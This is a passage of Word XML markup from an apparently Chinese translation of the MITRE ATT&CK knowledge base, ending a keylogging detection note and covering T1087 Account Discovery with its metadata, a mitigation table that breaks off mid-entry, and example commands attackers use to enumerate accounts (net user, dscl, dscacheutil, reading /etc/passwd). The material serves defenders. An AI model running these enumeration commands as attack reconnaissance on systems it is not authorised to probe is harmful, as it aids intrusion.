            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不使用时取出智能卡。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B9D1783" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549BE9E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者是否</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用代理智能卡连接可能是困难的，因为它需要将令牌插入系统中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，它更有可能被合法用户使用并融入其他网络行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C696A14" w14:textId="752E24A5" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00563665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入捕获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键盘记录活动可以采用各种形式，但可以通过安装驱动程序，设置</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或使用与轮询相关联的特定</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7686">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用来拦截击键来检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73178AAE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69303A82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:sectPr w:rsidR="000F2665" w:rsidSect="00D7725A">
          <w:headerReference w:type="first" r:id="rId169"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114C03A3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CE16DC" w:rsidRDefault="00A0413E" w:rsidP="00BA6351">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE16DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C343778" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="6B79188B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A40B35C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1087</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2DB62D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B2A973" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C1B7719" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B4B727" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r>
              <w:t>，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73E30811" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId170" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="007019E7">
                <w:t>CAPEC-575</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67B95727" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C51716C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00973350" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FAF844F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007019E7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B738F43" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会尝试获取本地系统或域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的列表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4BB889" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F32646" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以获取此信息的示例命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net localgroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dsquery</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试图识别主要用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前登录的用户或通常使用系统的一组用户，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“系统</w:t>
      </w:r>
      <w:r>
        <w:t>所有者</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751048B5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC23C92" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>ac</w:t>
      </w:r>
      <w:r>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>dscl . list /Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>dscacheutil -q group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令可用来</w:t>
      </w:r>
      <w:r>
        <w:t>枚举群组和用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A6769" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487DEDBA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可读的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来枚举本地用户。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，该文件仅在单用户模式下使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/master.passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之外</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215D675" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> groups</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD110D5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="003B4BD8" w14:paraId="7B5AC358" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="017F9C6A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003B4BD8" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B4BD8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="17A04A9A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003B4BD8" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B4BD8">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00974391" w14:paraId="5BB13F04" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="640504A9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00974391" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId171" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00974391">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F90A907" w14:textId="5330538C" w:rsidR="00A0413E" w:rsidRPr="00974391" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防止</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:t>通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提升应用权限时枚举管理员帐户，因为这可能导致账号名泄露。注册表项位于</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00974391">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GPO</w:t>
            </w:r>
